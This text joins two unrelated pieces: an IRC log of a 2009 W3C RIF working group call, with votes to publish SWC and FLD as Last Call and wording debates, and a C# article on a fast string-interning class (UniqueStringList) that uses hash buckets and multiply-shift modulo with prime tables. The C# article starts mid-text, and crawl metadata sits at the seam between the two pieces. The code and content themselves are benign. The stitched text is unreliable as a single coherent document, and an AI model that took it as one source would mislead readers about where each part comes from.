The content of the bucket is an int being a 'pointer' into the slots array, but note that in the for/next loop, we subtract one first to get the actual index to use. The reason for this is that when an array is created, it initially contains all zeros (all memory allocations work this way). We could set all values in the buckets array to be -1 to indicate an empty bucket, but this would be slower than just assuming that the contents of the array are all 1-based and always subtracting 1 to get the 0-based head Slot index. An empty bucket would hold its original 0 but the for loop would then start with i == -1 and jump out immediately because of the conditional expression. If the for/next loop is entered, then this indicates a valid Slot but not necessarily holding our search string. We compare hash codes first (the positive hash code we stored) and only if they are the same do we need to actually compare the strings. If we find a match, we jump out of the loop with the search complete and the index found, otherwise the loop-expression will use the Next member of the Slot to set i to the next Slot to try. (A Next with a -1 will indicate the end of the list with the item not found and jump out of the loop.)
for/next
i == -1
i
If execution ends up after the for/next loop, then the search string has not been located and will need to be added to the list. At this point, we check to see if the slots array is currently full and, if it is, call the Expand method to increase it (and the buckets array in proportion), not forgetting to recalculate the bucket index. The last unused Slot is then populated with the information we have and its index returned to the caller. Thus any string is always found. Note how the Next member is set to buckets[bucketIndex] - 1 which was the head of the linked list. This Slot will now become second in the linked list, with our newly populated Slot becoming the head. We increment slotIndex first and then store it in the buckets array (the increment is done first because buckets is 1-based) to make it officially the head Slot for the hash code.
slots
Expand
buckets
buckets[bucketIndex] - 1
slotIndex
The Expand() method is even simpler. The first thing is to calculate the new number of buckets always ensuring we use a Golden Prime number and one that is larger than the previous one used. We store this QuickDivideInfo struct and adjust the capacity variable to match our LoadFactor.
Expand()
LoadFactor
The increase in bucket capacity invalidates the existing buckets so they are simply thrown away and recreated as a new array. The slots array still holds (mostly) valid information so Array.Resize is used to increase the capacity but preserve the existing Slots. The final step is to recreate the hash buckets from the preserved Slots. The loop iterates over all the existing Slots and uses the positive hash code we preserved to calculate the new bucket index without having to call GetHashCode() again - another improvement over the original code, especially for long strings. The Next member on the Slot is set to whatever the current bucket holds, and then the bucket is updated to point to the current Slot (adjusting for the 1-based indexing in both cases). Thus the linked list is recreated automatically.
Array.Resize
The other code is straightforward but it might be worth pointing out that the code in the Add() and Intern() methods all rely on C#'s left to right expression evaluation to detect when a string has just been added to the list. The *current* slotIndex is evaluated first and then AddIfMissing() is called which may increment slotIndex. If the numbers are the same then the string was just added. Note however that if AddIfMissing() is called first then this will not work and will always return false.
A question was asked about the code used to test performance so I have now added a download containing the whole solution (.NET 4.0/VS2010) including the source code above and the performance testing code (based on NUnit 2.5.2).
Whilst I was tidying the code so it was suitable for release, I refactored the speed testing code into an abstract class suitable for reuse. You just need to inherit your test class from TimingTestFixture and you will have access to the same performance testing code.
TimingTestFixture
As an example, a [Test] method would look like:
[Test]
[Test]
public void UniqueStringList_AddCopies()
{
TimeProcess(() =>
{
var l = new UniqueStringList();
for (var i = 0; i < words.Length; i++)
{
l.Add(words[i]);
l.Add(copiedWords[i]);
}
Assert.AreEqual(words.Length, l.Count);
});
}
and return this output to the Console (or Unit Test Output Window):
Timing per Process; 10 sets; 20 repeats per set; GC Mode=PerRepeat:
1: Total set time=639 ms. Average process time=31.950000 ms. GC(62/62/61). Memory used=6,236,952 bytes.
2: Total set time=640 ms. Average process time=32.000000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
3: Total set time=639 ms. Average process time=31.950000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
4: Total set time=626 ms. Average process time=31.300000 ms. GC(2077/2077/61). Memory used=6,236,952 bytes.
5: Total set time=627 ms. Average process time=31.350000 ms. GC(1088/1088/61). Memory used=6,236,952 bytes.
6: Total set time=628 ms. Average process time=31.400000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
7: Total set time=625 ms. Average process time=31.250000 ms. GC(1248/1248/61). Memory used=6,236,952 bytes.
8: Total set time=626 ms. Average process time=31.300000 ms. GC(596/596/61). Memory used=11,196,296 bytes.
9: Total set time=627 ms. Average process time=31.350000 ms. GC(912/912/61). Memory used=6,236,952 bytes.
10: Total set time=629 ms. Average process time=31.450000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
All:
Fastest: 625 ms, Slowest: 640 ms, Average: 630.60 ms (31.530000 ms), StdDevP: 5.82 ms (0.92%)
Best 9: (excludes 2).
Fastest: 625 ms, Slowest: 639 ms, Average: 629.56 ms (31.477778 ms), StdDevP: 5.17 ms (0.82%)
Best 8: (excludes 1-2).
Fastest: 625 ms, Slowest: 639 ms, Average: 628.38 ms (31.418750 ms), StdDevP: 4.18 ms (0.67%)
Best 7: (excludes 1-3).
Fastest: 625 ms, Slowest: 629 ms, Average: 626.86 ms (31.342857 ms), StdDevP: 1.25 ms (0.20%)
As you can see, the output is reasonably comprehensive. As well as the set/per process timings, it also shows memory usage and the counts for each Garbage Collection Generation collected during each set.
The additional summaries at the bottom show the figures when the slower sets are excluded, which can be useful when other processes on your machine happen to kick in and slow you down when you are performance testing.
The tests can be executed using Resharper's Unit Test Runner (or equivalent) for maximum convenience, or individually as a Console application to give slightly more accurate and faster figures. Either way, always remember to ensure Release Mode is on!
TimingTestFixture has a number of properties such as TimingCount (default=10), RepeatCount (default=20), and so on.
TimingCount
RepeatCount
You can change any/all the figures by adding a constructor to your [TestFixture] class which calls this constructor on TimingTestFixture:
[TestFixture]
protected TimingTestFixture(int defaultTimingCount = 10,
int defaultRepeatCount = 20,
GarbageCollectMode defaultGarbageCollectMode =
GarbageCollectMode.PerRepeat,
TimingMode defaultTimingMode = TimingMode.AutoByRepeatCount,
bool defaultPerformJITPass = true,
bool defaultUseHighPriorityThread = true)
All tests in your class will then use your default settings.
Additionally, you can set any of the properties at the start of your [Test] method to override the default for that method only - TimingTestFixture/Nunit will reset back to the defaults before running other [Test] methods.
For comparison, UniqueStringListOriginal returned these figures:
UniqueStringListOriginal
Timing per Process; 10 sets; 20 repeats per set; GC Mode=PerRepeat:
1: Total set time=1,286 ms. Average process time=64.300000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
2: Total set time=1,285 ms. Average process time=64.250000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
3: Total set time=1,285 ms. Average process time=64.250000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
4: Total set time=1,285 ms. Average process time=64.250000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
5: Total set time=1,289 ms. Average process time=64.450000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
6: Total set time=1,287 ms. Average process time=64.350000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
7: Total set time=1,291 ms. Average process time=64.550000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
8: Total set time=1,289 ms. Average process time=64.450000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
9: Total set time=1,293 ms. Average process time=64.650000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
10: Total set time=1,287 ms. Average process time=64.350000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
All:
Fastest: 1,285 ms, Slowest: 1,293 ms, Average: 1,287.70 ms (64.385000 ms), StdDevP: 2.61 ms (0.20%)
Best 9: (excludes 9).
Fastest: 1,285 ms, Slowest: 1,291 ms, Average: 1,287.11 ms (64.355556 ms), StdDevP: 2.02 ms (0.16%)
Best 8: (excludes 7, 9).
Fastest: 1,285 ms, Slowest: 1,289 ms, Average: 1,286.63 ms (64.331250 ms), StdDevP: 1.58 ms (0.12%)
Best 7: (excludes 5, 7, 9).
Fastest: 1,285 ms, Slowest: 1,289 ms, Average: 1,286.29 ms (64.314286 ms), StdDevP: 1.39 ms (0.11%)
Since the new code shows ~31.5ms compared to the old code's ~63.3ms, I can confidently claim it is now twice as fast!
Whilst writing this code, I was especially interested in ensuring that calls to the methods on QuickDivideInfo got inlined for speed. I don't know a way to easily check the JIT output so I relied on timings of test cases. I wrote three tests for each method: one to time the normal operation (divide or modulo), one to put the multiplication and shift actually inline, and one to call the QuickDivideInfo method. If the latter two produced roughly equal times, then the method was assumed to have been inlined. Both should also produce times roughly one third of that method using the normal operator.
I was surprised when one of the sets produced funny results. At first I thought my method was not being inlined but then I noticed that the test with the physically inlined optimization was also not showing the expected speed up!
This code:
var check = 0;
for (var numerator = 0; numerator <= maxNumerator; numerator++)
{
check += numerator >= 0
? numerator - (int) ((numerator * qdi.Multiplier) >> qdi.Shift) * qdi.Divisor
: numerator - (int) -((-numerator * qdi.Multiplier) >> qdi.Shift) * qdi.Divisor;
}
return check;
ran 3 times faster than this code:
var check = 0;
for (var numerator = 0; numerator <= maxNumerator; numerator++)
{
check += numerator >= 0
? (int) ((numerator * qdi.Multiplier) >> qdi.Shift)
: (int) -((-numerator * qdi.Multiplier) >> qdi.Shift);
}
return check;
yet it had more operations to complete!
I eventually discovered that I could get the the expected speed increase back by either inverting the condition to be '<0' or by changing to a if/else construct (with either condition).
<0
if
else
So out of the 4 ways of writing the expression, 3 produced fast JITed code but the other, the one I happened to have chosen, produced slow JITed code.
So my conclusion is that there isn't a bug as such in the JIT-compiler since the results were correct but there is definitely something that could be improved. And it has made me a little uneasy about using ?: in performance-critical code.
?:
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
S<T>::f(U) // Out of line.
SimmoTech wrote:Although the code does a '-= 4' in the loop, the pointers are integers so are four bytes each and it uses indexers [0] and [1] so all chars are actually included.
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | http://www.codeproject.com/Articles/192371/UniqueStringList-Revisited | CC-MAIN-2016-18 | refinedweb | 5,192 | 56.25 |
Is there a command available for use with key bindings for the action “Close Other Tabs”?
Thanks for any insights you have!
Is there a command available for use with key bindings for the action “Close Other Tabs”?
Thanks for any insights you have!
The command for that is
close_others_by_index, but it requires you to provide the
group that the file is in (the visible pane in the layout) as well as the
index into that group, so that the command knows what tabs it should be closing. That makes binding the command to a key problematic because the
group and
index will vary.
You could use a plugin like the following, which implements a
close_other_tabs command that captures the appropriate
group and
index and calls that command for you, though. To use it, use
Tools > Developer > New Plugin... from the menu, then replace the stub with the plugin code and save it as a
.py file in the location that Sublime defaults to.
import sublime import sublime_plugin class CloseOtherTabsCommand(sublime_plugin.TextCommand): """ Tells the window to close all other views that share the same group in the layout as the current file. """ def run(self, edit): group, index = self.view.window().get_view_index(self.view) self.view.window().run_command("close_others_by_index", { "group": group, "index": index }) | https://forum.sublimetext.com/t/keyboard-shortcut-for-close-other-tabs/43512 | CC-MAIN-2019-18 | refinedweb | 213 | 73.78 |
ezLCDuino Backpack
- patrickmccabe's blog
- Login or register to post comments
- by patrickmccabe
- Collected by 3 users
June 26, 2011.
Price is $20 for a full kit without a LCD and $25 for a full kit WITH a 16x2 LCD. (plus $5 shipping in the USA). A kit consists of everything you will need to assemble which includes a PCB, caps, resistors, transistor, resonator, trim pot, IC socket, Atmega 328 with Arduino Bootloader, and 40 breakaway male headers. Like I said before, for an extra $5 ($25 total) you get a LCD too. It is a white on blue LCD.
Update 07.15.11
Well the PCB are here and I have assembled and tested one.
Some labeled resistors and notice the polarity of the electrolytic cap. The sqaure pad is positive, that is the one on the left in the photo below.
V1.2
There are resistors on the UART pins to allow users to program the Arduino without unplugging what they have connected the TX and RX lines. There is an added 10uf cap. A transistor allows the backlight to be turned on and off or PWMed from pin 9.
V1.1
Added more power connections on the communication row so the board can be interfaced to using a 4 or 3 pin cable depending on if you are using I2C or using serial with just RX or with TX as well.
V1.0
This is my ezLCDuino Backpack. It is an Arduino LCD backpack. This will solder on directly onto the back of a LCD allowing you to control it using the Arduino LCD library.
Features:
- FTDI programming port
- I2C communication pins
- Serial communication pins (hardware and software)
- Trim pot for adjusting the LCD contrast
- Arduino Atmega 328
- 4 spare Analog pins (not including the ones used for I2C communication)
- 3 spare digital pins (not including the ones used for serial communication)
- PWM control of the backlight
- Resistors allow the Arduino to be programmed without unplugging devices connected to the TX and RX pinscontroller in your project that contains a LCD, or use it as a slave to control the LCD in your project and provide extra pins and processing power.
I will order some PCBs this week and get them in people's hands soon. Tell me what you think.
This is a bit embarrassing...
Oh geeze, I can't believe I am asking this...
How do I receive a string and print it on the LCD? --In my defense, I am just a little rusty on the ol' Arduino, and I am missing something pretty simple, I would assume.
My little system works, all my "commands" work, but when the string I receive is displayed on the LCD, I am getting one of those silly rectangular boxes in front of the "H" in my "Hello World". Where the heck is this extra character coming from? It shouldn't be the "T" qualifier, that should have been "eaten up" with the first Serial.read. I'm stumped.
Embarrassing...
#include <LiquidCrystal.h>
#define backlight 9
int RxData;
int X;
int Y;
boolean scrollOn=false;
long previousMillis = 0;
long interval = 250;
LiquidCrystal lcd(11, 12, 5, 4, 3, 2);
void setup()
{
Serial.begin(115200);
pinMode(backlight, OUTPUT);
analogWrite(backlight, 200);
lcd.begin(16, 2);
}
void loop()
{
unsigned long currentMillis = millis();
if (Serial.available()>0) // command available
{
int qualifier=Serial.read();
switch (qualifier)
{
case 'C':
lcd.clear();
break;
case 'H':
lcd.home();
break;
case 'I':
lcd.display();
break;
case 'O':
lcd.noDisplay();
break;
case 'L':
if (scrollOn)
{
scrollOn=false;
}else{
scrollOn=true;
}
break;
case 'B':
RxData=Serial.read();
analogWrite(backlight, RxData);
break;
case 'S':
X=Serial.read();
Y=Serial.read();
lcd.setCursor(X,Y);
break;
case 'T':
do
{
RxData = Serial.read(); //read Serial
lcd.print(RxData,BYTE); //prints the character just read
}while (Serial.available());
}
Serial.flush();
}
if (scrollOn)
{
if(currentMillis - previousMillis > interval) {
previousMillis = currentMillis;
lcd.scrollDisplayLeft();
}
}
}
CtC, You are doing a
CtC, You are doing a Serial.read() without checking if a character has been available. Serial.read() is non blocking, will return -1 if no character is available.
Funny thing , I have done the same mistake, when I test your secret program.
So,
The following line:
lcd.print(RxData,BYTE); //prints the character just read
Could be:
if RxData > -1 {
lcd.print(RxData,BYTE); //prints the character just read
}
There might be an else required to clean the code up?
Yeah, I just tested this on
Yeah, I just tested this on mine and that was the problem. Should fix it for CTC.
Awesome
Awesome product, and a great price compared to other products.
Definalt will look at getting one when i get paid :P
Just out of curiosity, where do you get your LCDs from at that price?
Ebay, the ultimate supplier.
Ebay, the ultimate supplier.
Haha Nice. I have to agree
Haha Nice. I have to agree :P ( they are the best place for SMD resistors and caps!)
Got Mine!
Thanks Pat
Thats a good looking PCB
Great job with the PCB looks good. Looks even better with the LCD module... :)
I was wondering which CAD tool you used to design it.
Got the boards done from seeed studio...?
I use the free version
I use the free version of EagleCAD
Yup, I had them made at Seeedstudio. | http://letsmakerobots.com/node/27547 | CC-MAIN-2014-23 | refinedweb | 883 | 65.93 |
Alexey Dobriyan wrote:>> Again, so to checkpoint one task in the topmost pid-ns you need to>> checkpoint (if at all possible) the entire system ?!> > One more argument to not allow "leaks" and checkpoint whole container,> no ifs, buts and woulditbenices.> > Just to clarify, C/R with "leak" is for example when process has separate> pidns, but shares, for example, netns with other process not involved in> checkpoint.> > If you allow this, you lose one important property of checkpoint part,> namely, almost everything is frozen. Losing this property means suddenly> much more stuff is alive during dump and you has to account to more stuff> when checkpointing. You effectively checkpointing on live data structures> and there is no guarantee you'll get it right.Alexey, we're entirely on par about this: everyone agrees that if youwant the maximal guarantee (if one exists) you must checkpoint entirecontainer and have no leaks.The point I'm stressing is that there are other use cases, and otherusers, that can do great things even without full container. And mygoal is to provide them this capability. Specially since the mechanismis shared by both cases.> > Example 1: utsns is shared with the rest of the world.> > utsns content is modifiable only by tasks (current->nsproxy->uts_ns).> Consequently, someone can modify utsns content while you're dumping it> if you allow "leaks".> > Did you take precautions? 
Where?> > static int cr_write_utsns(struct cr_ctx *ctx, struct uts_namespace *uts_ns)> {> struct cr_hdr h;> struct cr_hdr_utsns *hh;> int domainname_len;> int nodename_len;> int ret;> > h.type = CR_HDR_UTSNS;> h.len = sizeof(*hh);> > hh = cr_hbuf_get(ctx, sizeof(*hh));> if (!hh)> return -ENOMEM;> > nodename_len = strlen(uts_ns->name.nodename) + 1;> domainname_len = strlen(uts_ns->name.domainname) + 1;> > hh->nodename_len = nodename_len;> hh->domainname_len = domainname_len;> > ret = cr_write_obj(ctx, &h, hh);> cr_hbuf_put(ctx, sizeof(*hh));> if (ret < 0)> return ret;> > ret = cr_write_string(ctx, uts_ns->name.nodename, nodename_len);> if (ret < 0)> return ret;> > ret = cr_write_string(ctx, uts_ns->name.domainname, domainname_len);> return ret;> }> > You should take uts_sem.Fair enough. Will fix :)However, even with leaks count you need the uts_sem, because it ifthis is shared by another task when you start the checkpoint, butnot shared by the time you do the leak check - then you missed it.And then, even the semaphore won't work unless you keep it for theentire duration of the checkpoint: if task A and B inside thecontainer both know something about the UTS contents, and task Coutside modified it before the checkpoint was taken, then, at leastpotentially, we have an inconsistency that neither you or I detect.The best part of it, however, it is unlikely that either A or Bwould ever *care* about that, especially in the case of UTS.And that brings me to the moral: in so many cases the user will livehappily ever after even if the UTS is changes 50 times during thecheckpoint. Because her tasks don't care about it.Remember that "flexibility" argument in my first post to this thread:the next step is that the user can say "cradvise(UTS, I_DONT_CARE)":during checkpoint the kernel won't save it, during restart the kernelwon't restore it. 
Voila, so little effort to make people happy :)> > > Example 2: ipcns is shared with the rest of the world> > Consequently, shm segment is visible outside and live. Someone already> shmatted to it. What will end up in shm segment content? Anything.This is another excellent example. You are _so_ right that it doesn'tmake much sense to try to restart a program that relies on somethingthat isn't part of the checkpoint.And yet, there are a handful programs, applications, processes thatdo not depend on the outside world in any important way, tasks thatfrankly, my dear, don't give a ...> > You should check struct file refcount or something and disable attaching> while dumping or something.Yes, yes, yes !But -- when you focus solely on the full-container-only case.Deciding what's best for the users is a two-edged-sword. It workswell to achieve foolproof operation with the less knowledgeable,but it's a bit of an arrogant approach for the more sophisticatedones.If you limit c/r to a full-container-only, you take away a freedomfrom the users - you take away a huge opportunity to use the c/rto its full potential. And you have this extra functionality fornearly free ! It's like giving the user a full blown linux laptopbut disallowing use of the command line :p> > Moral: Every time you do dump on something live you get complications.> Every single time."while(1);" will never have complications... :)And seriously, yes, you can bring endless examples of when it won'twork. And others will bring their examples of when it will be okeven with "complications", because if you don't care about certainstuff, the "complication" becomes void.We can always restrict c/r later, either by code, or privileges, orsystem config, sysadmin policy, flag to checkpoint(2), you name it.So those who seek general case guarantee are happy. Why do it a-prioriand block all other users ? 
is it of everyone's best interest todecide now that no-one should ever do so ?Oren.> > > There are sockets and live netns as the most complex example. I'm not> prepared to describe it exactly, but people wishing to do C/R with> "leaks" should be very careful with their wishes.> | https://lkml.org/lkml/2009/4/15/446 | CC-MAIN-2018-13 | refinedweb | 891 | 64.1 |
#include <GList.h>
#include <GList.h>
Inheritance diagram for GList:
"List"
Constructor.
-1
Adds a preexisting column to the control.
50
Adds a column to the list.
Get the display mode.
true
Insert a list of item.
Inserts the item 'p' at index 'Index'.
[virtual]
Called when a column is clicked.
[inline, virtual]
Called when a column is dragged somewhere.
Called when the column is dropped to a new location.
Called when the user selects an item and starts to drag it.
Called when an item is clicked.
Called when the user selects an item. If multiple items are selected in one hit this is only called for the first item. Use GetSelection to get the extent of the selected items..
Called every so often by the timer system.
Reimplemented from GView.
Set the display mode.
Sort the list. | http://www.memecode.com/lgi/docs/classGList.html | crawl-001 | refinedweb | 139 | 81.09 |
Example:

import "dart:async";
import "dart:io";
import "package:build_tools/build_shell.dart";
import "package:build_tools/build_tools.dart";

Future main(List<String> args) async {
  target("default", ["breakfast"], (t, args) {
    print("Very good!");
  });
  target("breakfast", ["eat sandwich", "drink coffee"], (t, args) {
    print(t.name);
  });
  target("drink coffee", ["make coffee"], (t, args) {
    print(t.name);
  });
  target("eat sandwich", ["make sandwich"], (t, args) {
    print(t.name);
  });
  target("make coffee", [], (t, args) {
    print(t.name);
  });
  target("make sandwich", ["take bread", "take sausage"], (t, args) {
    print(t.name);
  });
  target("take bread", [], (t, args) {
    print(t.name);
  });
  target("take sausage", [], (t, args) {
    print(t.name);
  });
  exit(await new BuildShell().run(args));
}
Output:
take bread
take sausage
make sandwich
eat sandwich
make coffee
drink coffee
breakfast
Very good!
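The run order falls out of depth-first dependency resolution: each target's sources run (at most once) before the target itself. Here is a minimal Python sketch of that resolution — a hypothetical analogy for illustration, not the package's actual implementation:

```python
def resolve(name, targets, done, order):
    # Run each dependency depth-first, then the target itself, each at most once.
    if name in done:
        return
    done.add(name)
    deps, action = targets[name]
    for dep in deps:
        resolve(dep, targets, done, order)
    order.append(name)
    action(name)

# The breakfast example from above, as plain data.
targets = {
    "default": (["breakfast"], lambda name: print("Very good!")),
    "breakfast": (["eat sandwich", "drink coffee"], print),
    "drink coffee": (["make coffee"], print),
    "eat sandwich": (["make sandwich"], print),
    "make coffee": ([], print),
    "make sandwich": (["take bread", "take sausage"], print),
    "take bread": ([], print),
    "take sausage": ([], print),
}

order = []
resolve("default", targets, set(), order)
```

Running this reproduces the order shown above, ending with breakfast and then "Very good!".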
Short list of features:
Targets (tasks)
The targets describe the tasks and their dependencies (sources).

target("build", ["compile", "link"], (Target t, Map args) {
  // build after compile and link
});

Rules

Rules describe make-style pattern transformations (e.g. %.cc => %.obj).
rules(["%.html", "%.htm"], ["%.md"], (Target t, Map args) {
  // transform %.html => %.md
  // transform %.htm => %.md
});
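A make-style pattern rule like this one just maps matching source names to target names by substituting the % stem. A small Python sketch of that matching — a hypothetical helper, not build_tools code:

```python
def expand_rule(target_pat, source_pat, sources):
    # `%` stands for the file stem, as in make-style patterns: %.html <= %.md
    src_suffix = source_pat.lstrip("%")
    tgt_suffix = target_pat.lstrip("%")
    mapping = {}
    for src in sources:
        if src.endswith(src_suffix):
            stem = src[: -len(src_suffix)]
            mapping[stem + tgt_suffix] = src
    return mapping
```

For example, expand_rule("%.html", "%.md", ["index.md", "notes.md", "logo.png"]) maps index.md and notes.md to their .html targets and ignores the non-matching logo.png.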
Hooks
The hooks allow specifying target actions that will be performed before or after other target actions.
after(["git:commit"], (Target t, Map args) {
  // action
});
before(["compile", "link"], (Target t, Map args) {
  // action
});
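Conceptually, a hook just wraps the target's action with extra callbacks. A rough Python analogy of that wrapping — not the package's implementation:

```python
def with_hooks(action, before=(), after=()):
    # Return an action that runs the `before` hooks, the action itself,
    # then the `after` hooks, passing the target name to each.
    def wrapped(name):
        for hook in before:
            hook(name)
        action(name)
        for hook in after:
            hook(name)
    return wrapped
```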
Build shell
The built-in build shell lets you use the build scripts as command-line scripts.
exit(await new BuildShell().run(args)); | https://www.dartdocs.org/documentation/build_tools/0.0.11/index.html | CC-MAIN-2017-47 | refinedweb | 218 | 61.63 |
What is the up-to-date way to install pip on Windows?
-- Outdated -- use distribute, not setuptools as described here. --
As you mentioned, pip doesn't include an independent installer, but you can install it easily with its predecessor, easy_install.
So:
Extract the setup files into the C:\Python2x folder (don't copy the whole folder into it, just the content), because the python command doesn't work outside the C:\Python2x folder, and then run:

python setup.py install

Then add C:\Python2x\Scripts to the path.
You are done.
Now you can use pip install package to easily install packages as in Linux :)
As I sometimes have path problems, where one of my own cmd scripts is hidden (shadowed) by another program (earlier on the path), I would like to be able to find the full path to a program in Windows, given just its name.
Is there an equivalent to the UNIX command 'which'?
On UNIX, the which command prints the full path of the given command to easily find and repair these shadowing problems.
Windows Server 2003 and later provide the WHERE command.
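The same idea can be sketched in a few lines of Python: walk PATH in order and report the first hit, which is exactly why a directory earlier on the path can shadow a script in a later one (Python 3.3+ also ships a ready-made shutil.which):

```python
# Rough sketch of UNIX `which` / Windows `where`: walk PATH in order and
# return the first matching executable. The first hit wins, which is why
# an earlier directory can shadow a script in a later one.
import os
import tempfile

def which(cmd, path=None, exts=("",)):
    """Return the full path of `cmd`, or None if it is not on the path."""
    dirs = (path if path is not None else os.environ.get("PATH", "")).split(os.pathsep)
    for d in dirs:
        for ext in exts:  # on Windows you would pass PATHEXT entries here
            candidate = os.path.join(d, cmd + ext)
            if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
                return candidate
    return None

# Demonstrate shadowing with two fake install directories:
d1, d2 = tempfile.mkdtemp(), tempfile.mkdtemp()
for d in (d1, d2):
    exe = os.path.join(d, "mytool")
    with open(exe, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(exe, 0o755)

found = which("mytool", path=os.pathsep.join([d1, d2]))
```

The copy in d1 is returned even though d2 holds an identical one — the shadowing problem described in the question.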
It's certainly possible to develop on a Windows machine, in fact my first application was exclusively developed on the old Dell Precision I had at the time :)
There are two routes;
The first route requires modifying (or using a pre-modified) image of Leopard that can be installed on a regular PC. This is not as hard as you would think, although your success/effort ratio will depend upon how closely the hardware in your PC matches that in Mac hardware - e.g. if you're running a Core 2 Duo on an Intel Motherboard, with a NVidia graphics card you are laughing. If you're running an AMD machine or something without SSE3 it gets a little more involved.
If you purchase (or already own) a version of Leopard then this is a gray area since the Leopard EULA states you may only run it on an "Apple Labeled" machine. As many point out if you stick an Apple sticker on your PC you're probably covered.
The second option is the more costly. The EULA for the workstation version of Leopard prevents it from being run under emulation and as a result there's no support in VMWare for this. Leopard server however CAN be run under emulation and can be used for desktop purposes. Leopard server and VMWare are expensive however.
If you're interested in option 1) I would suggest starting at Insanelymac and reading the OSx86 sections.
I do think you should consider whether the time you will invest is going to be worth the money you will save though. It was for me because I enjoy tinkering with this type of stuff and I started during the early iPhone betas, months before their App Store became available.
Alternatively you could pickup a low-spec Mac Mini from eBay. You don't need much horse power to run the SDK and you can always sell it on later if you decide to stop development or buy a better Mac.
I was looking into Valgrind to help improve my C coding/debugging when I discovered it is only for Linux - I have no other need or interest in moving my OS to Linux so I was wondering if there is a equally good program for Windows.
As jakobengblom2 pointed out, valgrind has a suit of tools. Depending which one you are talking about there are different windows counter parts. I will only mention OSS or free tools here.
1. Download:
I can't seem to get the icons to display under Windows 7 and I really miss this from Windows XP.
How can it be fixed?
Windows_"'s prefixed to the ones you don't need). The TortoiseSVN Shell extensions are nicely named so you know what they do, the TortoiseCVS extensions are not. After looking through the source code, I found the pertinent information:
I have written a simple Java class to generate the hash values of the Windows Calculator file. I am using Windows 7 Professional with SP1. I have tried Java 6.0.29 and Java 7.0.03. Can someone tell me why I am getting different hash values from Java versus (many!) external utilities and/or websites? Everything external matches with each other, only Java is returning different results.
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.zip.CRC32;
import java.security.DigestInputStream;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class Checksum {
    private static int size = 65536;
    private static File calc = new File("C:/Windows/system32/calc.exe");

    /*
    C:\Windows\System32\calc.exe (verified via several different utilities)
    ----------------------------
    CRC-32b = 8D8F5F8E
    MD5     = 60B7C0FEAD45F2066E5B805A91F4F0FC
    SHA-1   = 9018A7D6CDBE859A430E8794E73381F77C840BE0
    SHA-256 = 80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22
    SHA-384 = 551186C804C17B4CCDA07FD5FE83A32B48B4D173DAC3262F16489029894FC008A501B50AB9B53158B429031B043043D2
    SHA-512 = 68B9F9C00FC64DF946684CE81A72A2624F0FC07E07C0C8B3DB2FAE8C9C0415BD1B4A03AD7FFA96985AF0CC5E0410F6C5E29A30200EFFF21AB4B01369A3C59B58

    Results from this class
    -----------------------
    CRC-32  = 967E5DDE
    MD5     = 10E4A1D2132CCB5C6759F038CDB6F3C9
    SHA-1   = 42D36EEB2140441B48287B7CD30B38105986D68F
    SHA-256 = C6A91CBA00BF87CDB064C49ADAAC82255CBEC6FDD48FD21F9B3B96ABF019916B
    */

    public static void main(String[] args) throws Exception {
        Map<String, String> hashes = getFileHash(calc);
        for (Map.Entry<String, String> entry : hashes.entrySet()) {
            System.out.println(String.format("%-7s = %s", entry.getKey(), entry.getValue()));
        }
    }

    private static Map<String, String> getFileHash(File file) throws NoSuchAlgorithmException, IOException {
        Map<String, String> results = new LinkedHashMap<String, String>();
        if (file != null && file.exists()) {
            CRC32 crc32 = new CRC32();
            MessageDigest md5 = MessageDigest.getInstance("MD5");
            MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
            MessageDigest sha256 = MessageDigest.getInstance("SHA-256");
            FileInputStream fis = new FileInputStream(file);
            byte data[] = new byte[size];
            int len = 0;
            while ((len = fis.read(data)) != -1) {
                crc32.update(data, 0, len);
                md5.update(data, 0, len);
                sha1.update(data, 0, len);
                sha256.update(data, 0, len);
            }
            fis.close();
            results.put("CRC-32", toHex(crc32.getValue()));
            results.put(md5.getAlgorithm(), toHex(md5.digest()));
            results.put(sha1.getAlgorithm(), toHex(sha1.digest()));
            results.put(sha256.getAlgorithm(), toHex(sha256.digest()));
        }
        return results;
    }

    private static String toHex(byte[] bytes) {
        String result = "";
        if (bytes != null) {
            StringBuilder sb = new StringBuilder(bytes.length * 2);
            for (byte element : bytes) {
                if ((element & 0xff) < 0x10) {
                    sb.append("0");
                }
                sb.append(Long.toString(element & 0xff, 16));
            }
            result = sb.toString().toUpperCase();
        }
        return result;
    }

    private static String toHex(long value) {
        return Long.toHexString(value).toUpperCase();
    }
}
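For comparison, the same streaming, multi-digest computation can be sketched in Python with hashlib and zlib (illustrative only; the chunk size mirrors the Java `size` field):

```python
# Streaming, multi-digest hashing like the Java class above, sketched with
# hashlib/zlib: read the stream once and feed every digest the same chunks.
import hashlib
import io
import zlib

def file_digests(stream, size=65536):
    """Read `stream` once, feeding CRC-32, MD5, SHA-1 and SHA-256 together."""
    crc = 0
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    while True:
        chunk = stream.read(size)
        if not chunk:
            break
        crc = zlib.crc32(chunk, crc)
        for d in digests.values():
            d.update(chunk)
    result = {"crc32": format(crc & 0xFFFFFFFF, "08X")}
    result.update({n: d.hexdigest().upper() for n, d in digests.items()})
    return result

data = b"hello world" * 1000          # stand-in for the file contents
r = file_digests(io.BytesIO(data), size=4096)
```

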